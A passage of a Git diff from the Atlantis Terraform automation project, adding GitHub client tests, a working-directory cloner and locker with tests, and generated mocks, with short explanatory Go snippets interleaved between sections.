- output, err = c.RunCommandWithVersion(log, path, []string{workspaceCommand, "select", "-no-color", workspace}, version, workspace)
- outputs = append(outputs, output)
- if err != nil {
- // If terraform workspace select fails we run terraform workspace
- // new to create a new workspace automatically.
- output, err = c.RunCommandWithVersion(log, path, []string{workspaceCommand, "new", "-no-color", workspace}, version, workspace)
- outputs = append(outputs, output)
- if err != nil {
- return outputs, err
- }
- }
- return outputs, nil
-}
-
// MustConstraint will parse one or more constraints from the given
// constraint string. The string must be a comma-separated list of
// constraints. It panics if there is an error.
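
The `sh -c` wrapper above is what makes env-var substitution in extra_args work end to end. A hedged sketch of the effect (echo stands in for the terraform binary; values are illustrative):

package main

import (
	"fmt"
	"os"
	"os/exec"
)

func main() {
	// Because the command line is interpreted by a shell, an extra arg
	// like -var-file=$WORKSPACE.tfvars expands before terraform sees it.
	tfCmd := "echo terraform plan -var-file=$WORKSPACE.tfvars"
	cmd := exec.Command("sh", "-c", tfCmd)
	cmd.Env = append(os.Environ(), "WORKSPACE=staging")
	out, _ := cmd.CombinedOutput()
	fmt.Print(string(out)) // terraform plan -var-file=staging.tfvars
}
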
diff --git a/server/events/vcs/client_test.go b/server/events/vcs/client_test.go
index 61060cd3b2..08ab443935 100644
--- a/server/events/vcs/client_test.go
+++ b/server/events/vcs/client_test.go
@@ -13,5 +13,4 @@
//
package vcs
-// todo: actually test
// purposefully empty to trigger coverage report
diff --git a/server/events/vcs/fixtures/fixtures.go b/server/events/vcs/fixtures/fixtures.go
index e3155f1992..6939162032 100644
--- a/server/events/vcs/fixtures/fixtures.go
+++ b/server/events/vcs/fixtures/fixtures.go
@@ -15,6 +15,14 @@ package fixtures
import "github.com/google/go-github/github"
+var PullEvent = github.PullRequestEvent{
+ Sender: &github.User{
+ Login: github.String("user"),
+ },
+ Repo: &Repo,
+ PullRequest: &Pull,
+}
+
var Pull = github.PullRequest{
Head: &github.PullRequestBranch{
SHA: github.String("sha256"),
diff --git a/server/events/vcs/github_client_internal_test.go b/server/events/vcs/github_client_internal_test.go
index 0769e8691f..71ac0371f0 100644
--- a/server/events/vcs/github_client_internal_test.go
+++ b/server/events/vcs/github_client_internal_test.go
@@ -76,3 +76,17 @@ func TestSplitAtMaxChars(t *testing.T) {
})
}
}
+
+// If the hostname is github.com, we should use the normal BaseURL.
+func TestNewGithubClient_GithubCom(t *testing.T) {
+ client, err := NewGithubClient("github.com", "user", "pass")
+ Ok(t, err)
+ Equals(t, "https://api.github.com/", client.client.BaseURL.String())
+}
+
+// If the hostname is a non-GitHub hostname, we should use the enterprise /api/v3 BaseURL.
+func TestNewGithubClient_NonGithub(t *testing.T) {
+ client, err := NewGithubClient("example.com", "user", "pass")
+ Ok(t, err)
+ Equals(t, "https://example.com/api/v3/", client.client.BaseURL.String())
+}
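
A sketch of the hostname-to-BaseURL rule these two tests pin down (this mirrors the expected behavior of NewGithubClient rather than its implementation):

package main

import (
	"fmt"
	"net/url"
)

func main() {
	for _, hostname := range []string{"github.com", "example.com"} {
		// github.com uses the public API host; anything else is treated
		// as GitHub Enterprise and gets the /api/v3/ prefix.
		base := &url.URL{Scheme: "https", Host: "api.github.com", Path: "/"}
		if hostname != "github.com" {
			base = &url.URL{Scheme: "https", Host: hostname, Path: "/api/v3/"}
		}
		fmt.Println(base.String())
	}
}
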
diff --git a/server/events/vcs/github_client_test.go b/server/events/vcs/github_client_test.go
new file mode 100644
index 0000000000..04678bc5fb
--- /dev/null
+++ b/server/events/vcs/github_client_test.go
@@ -0,0 +1,149 @@
+package vcs_test
+
+import (
+ "crypto/tls"
+ "fmt"
+ "io/ioutil"
+ "net/http"
+ "net/http/httptest"
+ "net/url"
+ "testing"
+
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/vcs"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+// GetModifiedFiles should make multiple requests if there is more than one
+// page and concatenate the results.
+func TestGithubClient_GetModifiedFiles(t *testing.T) {
+ respTemplate := `[
+ {
+ "sha": "bbcd538c8e72b8c175046e27cc8f907076331401",
+ "filename": "%s",
+ "status": "added",
+ "additions": 103,
+ "deletions": 21,
+ "changes": 124,
+ "blob_url": "https://github.com/octocat/Hello-World/blob/6dcb09b5b57875f334f61aebed695e2e4193db5e/file1.txt",
+ "raw_url": "https://github.com/octocat/Hello-World/raw/6dcb09b5b57875f334f61aebed695e2e4193db5e/file1.txt",
+ "contents_url": "https://api.github.com/repos/octocat/Hello-World/contents/file1.txt?ref=6dcb09b5b57875f334f61aebed695e2e4193db5e",
+ "patch": "@@ -132,7 +132,7 @@ module Test @@ -1000,7 +1000,7 @@ module Test"
+ }
+]`
+ firstResp := fmt.Sprintf(respTemplate, "file1.txt")
+ secondResp := fmt.Sprintf(respTemplate, "file2.txt")
+ testServer := httptest.NewTLSServer(
+ http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ switch r.RequestURI {
+ // The first request should hit this URL.
+ case "/api/v3/repos/owner/repo/pulls/1/files?per_page=300":
+ // We write a header that means there's an additional page.
+ w.Header().Add("Link", `<https://api.github.com/repos/owner/repo/pulls/1/files?page=2&per_page=300>; rel="next",
+ <https://api.github.com/repos/owner/repo/pulls/1/files?page=2&per_page=300>; rel="last"`)
+ w.Write([]byte(firstResp)) // nolint: errcheck
+ return
+ // The second should hit this URL.
+ case "/api/v3/repos/owner/repo/pulls/1/files?page=2&per_page=300":
+ w.Write([]byte(secondResp)) // nolint: errcheck
+ default:
+ t.Errorf("got unexpected request at %q", r.RequestURI)
+ http.Error(w, "not found", http.StatusNotFound)
+ return
+ }
+ }))
+
+ testServerURL, err := url.Parse(testServer.URL)
+ Ok(t, err)
+ client, err := vcs.NewGithubClient(testServerURL.Host, "user", "pass")
+ Ok(t, err)
+ defer disableSSLVerification()()
+
+ files, err := client.GetModifiedFiles(models.Repo{
+ FullName: "owner/repo",
+ Owner: "owner",
+ Name: "repo",
+ CloneURL: "",
+ SanitizedCloneURL: "",
+ VCSHost: models.VCSHost{
+ Type: models.Github,
+ Hostname: "github.com",
+ },
+ }, models.PullRequest{
+ Num: 1,
+ })
+ Ok(t, err)
+ Equals(t, []string{"file1.txt", "file2.txt"}, files)
+}
+
+func TestGithubClient_UpdateStatus(t *testing.T) {
+ cases := []struct {
+ status vcs.CommitStatus
+ expState string
+ }{
+ {
+ vcs.Pending,
+ "pending",
+ },
+ {
+ vcs.Success,
+ "success",
+ },
+ {
+ vcs.Failed,
+ "failure",
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.status.String(), func(t *testing.T) {
+ testServer := httptest.NewTLSServer(
+ http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ switch r.RequestURI {
+ case "/api/v3/repos/owner/repo/statuses/":
+ body, err := ioutil.ReadAll(r.Body)
+ Ok(t, err)
+ exp := fmt.Sprintf(`{"state":"%s","description":"description","context":"Atlantis"}%s`, c.expState, "\n")
+ Equals(t, exp, string(body))
+ defer r.Body.Close() // nolint: errcheck
+ w.WriteHeader(http.StatusOK)
+ default:
+ t.Errorf("got unexpected request at %q", r.RequestURI)
+ http.Error(w, "not found", http.StatusNotFound)
+ return
+ }
+ }))
+
+ testServerURL, err := url.Parse(testServer.URL)
+ Ok(t, err)
+ client, err := vcs.NewGithubClient(testServerURL.Host, "user", "pass")
+ Ok(t, err)
+ defer disableSSLVerification()()
+
+ err = client.UpdateStatus(models.Repo{
+ FullName: "owner/repo",
+ Owner: "owner",
+ Name: "repo",
+ CloneURL: "",
+ SanitizedCloneURL: "",
+ VCSHost: models.VCSHost{
+ Type: models.Github,
+ Hostname: "github.com",
+ },
+ }, models.PullRequest{
+ Num: 1,
+ }, c.status, "description")
+ Ok(t, err)
+ })
+ }
+}
+
+// disableSSLVerification disables ssl verification for the global http client
+// and returns a function to be called in a defer that will re-enable it.
+func disableSSLVerification() func() {
+ orig := http.DefaultTransport.(*http.Transport).TLSClientConfig
+ http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{InsecureSkipVerify: true}
+ return func() {
+ http.DefaultTransport.(*http.Transport).TLSClientConfig = orig
+ }
+}
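
disableSSLVerification is meant to be used with the double-call defer idiom so verification is restored even if the test fails. A minimal usage sketch (TestExample is a hypothetical test in this package):

package vcs_test

import "testing"

func TestExample(t *testing.T) {
	// disableSSLVerification() runs now; the restore func it returns is
	// deferred, so the global transport is always reset.
	defer disableSSLVerification()()
	// ... exercise a client against an httptest.NewTLSServer here ...
}
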
diff --git a/server/events/vcs/mocks/mock_client.go b/server/events/vcs/mocks/mock_client.go
index 56aa654b35..025488befd 100644
--- a/server/events/vcs/mocks/mock_client.go
+++ b/server/events/vcs/mocks/mock_client.go
@@ -35,8 +35,8 @@ func (mock *MockClient) GetModifiedFiles(repo models.Repo, pull models.PullReque
return ret0, ret1
}
-func (mock *MockClient) CreateComment(repo models.Repo, pull models.PullRequest, comment string) error {
- params := []pegomock.Param{repo, pull, comment}
+func (mock *MockClient) CreateComment(repo models.Repo, pullNum int, comment string) error {
+ params := []pegomock.Param{repo, pullNum, comment}
result := pegomock.GetGenericMockFrom(mock).Invoke("CreateComment", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()})
var ret0 error
if len(result) != 0 {
@@ -124,8 +124,8 @@ func (c *Client_GetModifiedFiles_OngoingVerification) GetAllCapturedArguments()
return
}
-func (verifier *VerifierClient) CreateComment(repo models.Repo, pull models.PullRequest, comment string) *Client_CreateComment_OngoingVerification {
- params := []pegomock.Param{repo, pull, comment}
+func (verifier *VerifierClient) CreateComment(repo models.Repo, pullNum int, comment string) *Client_CreateComment_OngoingVerification {
+ params := []pegomock.Param{repo, pullNum, comment}
methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "CreateComment", params)
return &Client_CreateComment_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
}
@@ -135,21 +135,21 @@ type Client_CreateComment_OngoingVerification struct {
methodInvocations []pegomock.MethodInvocation
}
-func (c *Client_CreateComment_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, string) {
- repo, pull, comment := c.GetAllCapturedArguments()
- return repo[len(repo)-1], pull[len(pull)-1], comment[len(comment)-1]
+func (c *Client_CreateComment_OngoingVerification) GetCapturedArguments() (models.Repo, int, string) {
+ repo, pullNum, comment := c.GetAllCapturedArguments()
+ return repo[len(repo)-1], pullNum[len(pullNum)-1], comment[len(comment)-1]
}
-func (c *Client_CreateComment_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []string) {
+func (c *Client_CreateComment_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []int, _param2 []string) {
params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
if len(params) > 0 {
_param0 = make([]models.Repo, len(params[0]))
for u, param := range params[0] {
_param0[u] = param.(models.Repo)
}
- _param1 = make([]models.PullRequest, len(params[1]))
+ _param1 = make([]int, len(params[1]))
for u, param := range params[1] {
- _param1[u] = param.(models.PullRequest)
+ _param1[u] = param.(int)
}
_param2 = make([]string, len(params[2]))
for u, param := range params[2] {
diff --git a/server/events/vcs/vcs_test.go b/server/events/vcs/vcs_test.go
new file mode 100644
index 0000000000..5333ff26fe
--- /dev/null
+++ b/server/events/vcs/vcs_test.go
@@ -0,0 +1,19 @@
+package vcs_test
+
+import (
+ "testing"
+
+ "github.com/runatlantis/atlantis/server/events/vcs"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestStatus_String(t *testing.T) {
+ cases := map[vcs.CommitStatus]string{
+ vcs.Pending: "pending",
+ vcs.Success: "success",
+ vcs.Failed: "failed",
+ }
+ for k, v := range cases {
+ Equals(t, v, k.String())
+ }
+}
diff --git a/server/events/working_dir.go b/server/events/working_dir.go
new file mode 100644
index 0000000000..191eb3c247
--- /dev/null
+++ b/server/events/working_dir.go
@@ -0,0 +1,150 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events
+
+import (
+ "os"
+ "os/exec"
+ "path/filepath"
+ "strconv"
+ "strings"
+
+ "github.com/pkg/errors"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/logging"
+)
+
+const workingDirPrefix = "repos"
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_working_dir.go WorkingDir
+
+// WorkingDir handles the workspace on disk for running commands.
+type WorkingDir interface {
+ // Clone git clones headRepo, checks out the branch and then returns the
+ // absolute path to the root of the cloned repo.
+ Clone(log *logging.SimpleLogger, baseRepo models.Repo, headRepo models.Repo, p models.PullRequest, workspace string) (string, error)
+ // GetWorkingDir returns the path to the workspace for this repo and pull.
+ // If workspace does not exist on disk, error will be of type os.IsNotExist.
+ GetWorkingDir(r models.Repo, p models.PullRequest, workspace string) (string, error)
+ // Delete deletes the workspace for this repo and pull.
+ Delete(r models.Repo, p models.PullRequest) error
+ DeleteForWorkspace(r models.Repo, p models.PullRequest, workspace string) error
+}
+
+// FileWorkspace implements WorkingDir with the file system.
+type FileWorkspace struct {
+ DataDir string
+ // TestingOverrideCloneURL can be used during testing to override the URL
+ // that is cloned. If it's empty then we clone normally.
+ TestingOverrideCloneURL string
+}
+
+// Clone git clones headRepo, checks out the branch and then returns the absolute
+// path to the root of the cloned repo. If the repo already exists and is at
+// the right commit it does nothing. This is to support running commands in
+// multiple dirs of the same repo without deleting existing plans.
+func (w *FileWorkspace) Clone(
+ log *logging.SimpleLogger,
+ baseRepo models.Repo,
+ headRepo models.Repo,
+ p models.PullRequest,
+ workspace string) (string, error) {
+ cloneDir := w.cloneDir(baseRepo, p, workspace)
+
+ // If the directory already exists, check if it's at the right commit.
+ // If so, then we do nothing.
+ if _, err := os.Stat(cloneDir); err == nil {
+ log.Debug("clone directory %q already exists, checking if it's at the right commit", cloneDir)
+ revParseCmd := exec.Command("git", "rev-parse", "HEAD") // #nosec
+ revParseCmd.Dir = cloneDir
+ output, err := revParseCmd.CombinedOutput()
+ if err != nil {
+ log.Err("will re-clone repo, could not determine if was at correct commit: git rev-parse HEAD: %s: %s", err, string(output))
+ return w.forceClone(log, cloneDir, headRepo, p)
+ }
+ currCommit := strings.Trim(string(output), "\n")
+ if currCommit == p.HeadCommit {
+ log.Debug("repo is at correct commit %q so will not re-clone", p.HeadCommit)
+ return cloneDir, nil
+ }
+ log.Debug("repo was already cloned but is not at correct commit, wanted %q got %q", p.HeadCommit, currCommit)
+ // We'll fall through to re-clone.
+ }
+
+ // Otherwise we clone the repo.
+ return w.forceClone(log, cloneDir, headRepo, p)
+}
+
+func (w *FileWorkspace) forceClone(log *logging.SimpleLogger,
+ cloneDir string,
+ headRepo models.Repo,
+ p models.PullRequest) (string, error) {
+
+ err := os.RemoveAll(cloneDir)
+ if err != nil {
+ return "", errors.Wrapf(err, "deleting dir %q before cloning", cloneDir)
+ }
+
+ // Create the directory and parents if necessary.
+ log.Info("creating dir %q", cloneDir)
+ if err := os.MkdirAll(cloneDir, 0700); err != nil {
+ return "", errors.Wrap(err, "creating new workspace")
+ }
+
+ log.Info("git cloning %q into %q", headRepo.SanitizedCloneURL, cloneDir)
+ cloneURL := headRepo.CloneURL
+ if w.TestingOverrideCloneURL != "" {
+ cloneURL = w.TestingOverrideCloneURL
+ }
+ cloneCmd := exec.Command("git", "clone", cloneURL, cloneDir) // #nosec
+ if output, err := cloneCmd.CombinedOutput(); err != nil {
+ return "", errors.Wrapf(err, "cloning %s: %s", headRepo.SanitizedCloneURL, string(output))
+ }
+
+ // Check out the branch for this PR.
+ log.Info("checking out branch %q", p.Branch)
+ checkoutCmd := exec.Command("git", "checkout", p.Branch) // #nosec
+ checkoutCmd.Dir = cloneDir
+ if err := checkoutCmd.Run(); err != nil {
+ return "", errors.Wrapf(err, "checking out branch %s", p.Branch)
+ }
+ return cloneDir, nil
+}
+
+// GetWorkingDir returns the path to the workspace for this repo and pull.
+func (w *FileWorkspace) GetWorkingDir(r models.Repo, p models.PullRequest, workspace string) (string, error) {
+ repoDir := w.cloneDir(r, p, workspace)
+ if _, err := os.Stat(repoDir); err != nil {
+ return "", errors.Wrap(err, "checking if workspace exists")
+ }
+ return repoDir, nil
+}
+
+// Delete deletes the workspace for this repo and pull.
+func (w *FileWorkspace) Delete(r models.Repo, p models.PullRequest) error {
+ return os.RemoveAll(w.repoPullDir(r, p))
+}
+
+// DeleteForWorkspace deletes the working dir for this repo, pull and workspace.
+func (w *FileWorkspace) DeleteForWorkspace(r models.Repo, p models.PullRequest, workspace string) error {
+ return os.RemoveAll(w.cloneDir(r, p, workspace))
+}
+
+func (w *FileWorkspace) repoPullDir(r models.Repo, p models.PullRequest) string {
+ return filepath.Join(w.DataDir, workingDirPrefix, r.FullName, strconv.Itoa(p.Num))
+}
+
+func (w *FileWorkspace) cloneDir(r models.Repo, p models.PullRequest, workspace string) string {
+ return filepath.Join(w.repoPullDir(r, p), workspace)
+}
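
Putting repoPullDir and cloneDir together, every repo/pull/workspace combination gets its own directory under DataDir. A small sketch of the resulting layout (the DataDir value and repo names are illustrative):

package main

import (
	"fmt"
	"path/filepath"
	"strconv"
)

func main() {
	// Mirrors FileWorkspace.cloneDir:
	// <DataDir>/repos/<repoFullName>/<pullNum>/<workspace>
	dataDir := "/home/atlantis/.atlantis"
	dir := filepath.Join(dataDir, "repos", "owner/repo", strconv.Itoa(1), "default")
	fmt.Println(dir) // /home/atlantis/.atlantis/repos/owner/repo/1/default
}
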
diff --git a/server/events/working_dir_locker.go b/server/events/working_dir_locker.go
new file mode 100644
index 0000000000..6c5559b415
--- /dev/null
+++ b/server/events/working_dir_locker.go
@@ -0,0 +1,78 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events
+
+import (
+ "fmt"
+ "sync"
+)
+
+//go:generate pegomock generate --use-experimental-model-gen --package mocks -o mocks/mock_working_dir_locker.go WorkingDirLocker
+
+// WorkingDirLocker is used to prevent multiple commands from executing
+// at the same time for a single repo, pull, and workspace. We need to prevent
+// this from happening because a specific repo/pull/workspace has a single workspace
+// on disk and we haven't written Atlantis (yet) to handle concurrent execution
+// within this workspace.
+type WorkingDirLocker interface {
+ // TryLock tries to acquire a lock for this repo, workspace and pull.
+ // It returns a function that should be used to unlock the workspace and
+ // an error if the workspace is already locked. The error is expected to
+ // be printed to the pull request.
+ TryLock(repoFullName string, workspace string, pullNum int) (func(), error)
+ // Unlock deletes the lock for this repo, workspace and pull. If there was no
+ // lock it will do nothing.
+ Unlock(repoFullName, workspace string, pullNum int)
+}
+
+// DefaultWorkingDirLocker implements WorkingDirLocker.
+type DefaultWorkingDirLocker struct {
+ mutex sync.Mutex
+ locks map[string]interface{}
+}
+
+// NewDefaultWorkingDirLocker is a constructor.
+func NewDefaultWorkingDirLocker() *DefaultWorkingDirLocker {
+ return &DefaultWorkingDirLocker{
+ locks: make(map[string]interface{}),
+ }
+}
+
+func (d *DefaultWorkingDirLocker) TryLock(repoFullName string, workspace string, pullNum int) (func(), error) {
+ d.mutex.Lock()
+ defer d.mutex.Unlock()
+
+ key := d.key(repoFullName, workspace, pullNum)
+ _, exists := d.locks[key]
+ if exists {
+ return func() {}, fmt.Errorf("the %s workspace is currently locked by another"+
+ " command that is running for this pull request–"+
+ "wait until the previous command is complete and try again", workspace)
+ }
+ d.locks[key] = true
+ return func() {
+ d.Unlock(repoFullName, workspace, pullNum)
+ }, nil
+}
+
+// Unlock unlocks the repo, pull and workspace.
+func (d *DefaultWorkingDirLocker) Unlock(repoFullName, workspace string, pullNum int) {
+ d.mutex.Lock()
+ defer d.mutex.Unlock()
+ delete(d.locks, d.key(repoFullName, workspace, pullNum))
+}
+
+func (d *DefaultWorkingDirLocker) key(repo string, workspace string, pull int) string {
+ return fmt.Sprintf("%s/%s/%d", repo, workspace, pull)
+}
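
Callers are expected to acquire the lock before running a command and release it via the returned function. A minimal usage sketch (the repo name and pull number are illustrative):

package main

import (
	"fmt"

	"github.com/runatlantis/atlantis/server/events"
)

func main() {
	locker := events.NewDefaultWorkingDirLocker()
	unlock, err := locker.TryLock("owner/repo", "default", 1)
	if err != nil {
		// The error text is designed to be posted back to the pull request.
		fmt.Println(err)
		return
	}
	defer unlock()
	// ... run plan/apply for owner/repo #1 in the default workspace ...
}
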
diff --git a/server/events/working_dir_locker_test.go b/server/events/working_dir_locker_test.go
new file mode 100644
index 0000000000..52274af3ab
--- /dev/null
+++ b/server/events/working_dir_locker_test.go
@@ -0,0 +1,154 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events_test
+
+import (
+ "testing"
+
+ "github.com/runatlantis/atlantis/server/events"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+var repo = "repo/owner"
+var workspace = "default"
+
+func TestTryLock(t *testing.T) {
+ locker := events.NewDefaultWorkingDirLocker()
+
+ // The first lock should succeed.
+ unlockFn, err := locker.TryLock(repo, workspace, 1)
+ Ok(t, err)
+
+ // Now another lock for the same repo, workspace, and pull should fail
+ _, err = locker.TryLock(repo, workspace, 1)
+ ErrEquals(t, "the default workspace is currently locked by another"+
+ " command that is running for this pull request–"+
+ "wait until the previous command is complete and try again", err)
+
+ // Unlock should work.
+ unlockFn()
+ _, err = locker.TryLock(repo, workspace, 1)
+ Ok(t, err)
+}
+
+func TestTryLockDifferentWorkspaces(t *testing.T) {
+ locker := events.NewDefaultWorkingDirLocker()
+
+ t.Log("a lock for the same repo and pull but different workspace should succeed")
+ _, err := locker.TryLock(repo, workspace, 1)
+ Ok(t, err)
+ _, err = locker.TryLock(repo, "new-workspace", 1)
+ Ok(t, err)
+
+ t.Log("and both should now be locked")
+ _, err = locker.TryLock(repo, workspace, 1)
+ Assert(t, err != nil, "exp err")
+ _, err = locker.TryLock(repo, "new-workspace", 1)
+ Assert(t, err != nil, "exp err")
+}
+
+func TestTryLockDifferentRepo(t *testing.T) {
+ locker := events.NewDefaultWorkingDirLocker()
+
+ t.Log("a lock for a different repo but the same workspace and pull should succeed")
+ _, err := locker.TryLock(repo, workspace, 1)
+ Ok(t, err)
+ newRepo := "owner/newrepo"
+ _, err = locker.TryLock(newRepo, workspace, 1)
+ Ok(t, err)
+
+ t.Log("and both should now be locked")
+ _, err = locker.TryLock(repo, workspace, 1)
+ ErrContains(t, "currently locked", err)
+ _, err = locker.TryLock(newRepo, workspace, 1)
+ ErrContains(t, "currently locked", err)
+}
+
+func TestTryLockDifferentPulls(t *testing.T) {
+ locker := events.NewDefaultWorkingDirLocker()
+
+ t.Log("a lock for a different pull but the same repo and workspace should succeed")
+ _, err := locker.TryLock(repo, workspace, 1)
+ Ok(t, err)
+ newPull := 2
+ _, err = locker.TryLock(repo, workspace, newPull)
+ Ok(t, err)
+
+ t.Log("and both should now be locked")
+ _, err = locker.TryLock(repo, workspace, 1)
+ ErrContains(t, "currently locked", err)
+ _, err = locker.TryLock(repo, workspace, newPull)
+ ErrContains(t, "currently locked", err)
+}
+
+func TestUnlock(t *testing.T) {
+ locker := events.NewDefaultWorkingDirLocker()
+
+ t.Log("unlocking should work")
+ unlockFn, err := locker.TryLock(repo, workspace, 1)
+ Ok(t, err)
+ unlockFn()
+ _, err = locker.TryLock(repo, workspace, 1)
+ Ok(t, err)
+}
+
+func TestUnlockDifferentWorkspaces(t *testing.T) {
+ locker := events.NewDefaultWorkingDirLocker()
+ t.Log("unlocking should work for different workspaces")
+ unlockFn1, err1 := locker.TryLock(repo, workspace, 1)
+ Ok(t, err1)
+ unlockFn2, err2 := locker.TryLock(repo, "new-workspace", 1)
+ Ok(t, err2)
+ unlockFn1()
+ unlockFn2()
+
+ _, err := locker.TryLock(repo, workspace, 1)
+ Ok(t, err)
+ _, err = locker.TryLock(repo, "new-workspace", 1)
+ Ok(t, err)
+}
+
+func TestUnlockDifferentRepos(t *testing.T) {
+ locker := events.NewDefaultWorkingDirLocker()
+ t.Log("unlocking should work for different repos")
+ unlockFn1, err1 := locker.TryLock(repo, workspace, 1)
+ Ok(t, err1)
+ newRepo := "owner/newrepo"
+ unlockFn2, err2 := locker.TryLock(newRepo, workspace, 1)
+ Ok(t, err2)
+ unlockFn1()
+ unlockFn2()
+
+ _, err := locker.TryLock(repo, workspace, 1)
+ Ok(t, err)
+ _, err = locker.TryLock(newRepo, workspace, 1)
+ Ok(t, err)
+}
+
+func TestUnlockDifferentPulls(t *testing.T) {
+ locker := events.NewDefaultWorkingDirLocker()
+ t.Log("unlocking should work for different pulls")
+ unlockFn1, err1 := locker.TryLock(repo, workspace, 1)
+ Ok(t, err1)
+ newPull := 2
+ unlockFn2, err2 := locker.TryLock(repo, workspace, newPull)
+ Ok(t, err2)
+ unlockFn1()
+ unlockFn2()
+
+ _, err := locker.TryLock(repo, workspace, 1)
+ Ok(t, err)
+ _, err = locker.TryLock(repo, workspace, newPull)
+ Ok(t, err)
+}
diff --git a/server/events/yaml/mocks/matchers/valid_spec.go b/server/events/yaml/mocks/matchers/valid_spec.go
new file mode 100644
index 0000000000..9c60066733
--- /dev/null
+++ b/server/events/yaml/mocks/matchers/valid_spec.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ valid "github.com/runatlantis/atlantis/server/events/yaml/valid"
+)
+
+func AnyValidConfig() valid.Config {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(valid.Config))(nil)).Elem()))
+ var nullValue valid.Config
+ return nullValue
+}
+
+func EqValidConfig(value valid.Config) valid.Config {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue valid.Config
+ return nullValue
+}
diff --git a/server/events/yaml/mocks/mock_parser_validator.go b/server/events/yaml/mocks/mock_parser_validator.go
new file mode 100644
index 0000000000..24655f8715
--- /dev/null
+++ b/server/events/yaml/mocks/mock_parser_validator.go
@@ -0,0 +1,80 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events/yaml (interfaces: ParserValidator)
+
+package mocks
+
+import (
+ "reflect"
+
+ pegomock "github.com/petergtz/pegomock"
+ valid "github.com/runatlantis/atlantis/server/events/yaml/valid"
+)
+
+type MockParserValidator struct {
+ fail func(message string, callerSkip ...int)
+}
+
+func NewMockParserValidator() *MockParserValidator {
+ return &MockParserValidator{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockParserValidator) ReadConfig(repoDir string) (valid.Config, error) {
+ params := []pegomock.Param{repoDir}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("ReadConfig", params, []reflect.Type{reflect.TypeOf((*valid.Config)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 valid.Config
+ var ret1 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(valid.Config)
+ }
+ if result[1] != nil {
+ ret1 = result[1].(error)
+ }
+ }
+ return ret0, ret1
+}
+
+func (mock *MockParserValidator) VerifyWasCalledOnce() *VerifierParserValidator {
+ return &VerifierParserValidator{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockParserValidator) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierParserValidator {
+ return &VerifierParserValidator{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockParserValidator) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierParserValidator {
+ return &VerifierParserValidator{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierParserValidator struct {
+ mock *MockParserValidator
+ invocationCountMatcher pegomock.Matcher
+ inOrderContext *pegomock.InOrderContext
+}
+
+func (verifier *VerifierParserValidator) ReadConfig(repoDir string) *ParserValidator_ReadConfig_OngoingVerification {
+ params := []pegomock.Param{repoDir}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ReadConfig", params)
+ return &ParserValidator_ReadConfig_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type ParserValidator_ReadConfig_OngoingVerification struct {
+ mock *MockParserValidator
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *ParserValidator_ReadConfig_OngoingVerification) GetCapturedArguments() string {
+ repoDir := c.GetAllCapturedArguments()
+ return repoDir[len(repoDir)-1]
+}
+
+func (c *ParserValidator_ReadConfig_OngoingVerification) GetAllCapturedArguments() (_param0 []string) {
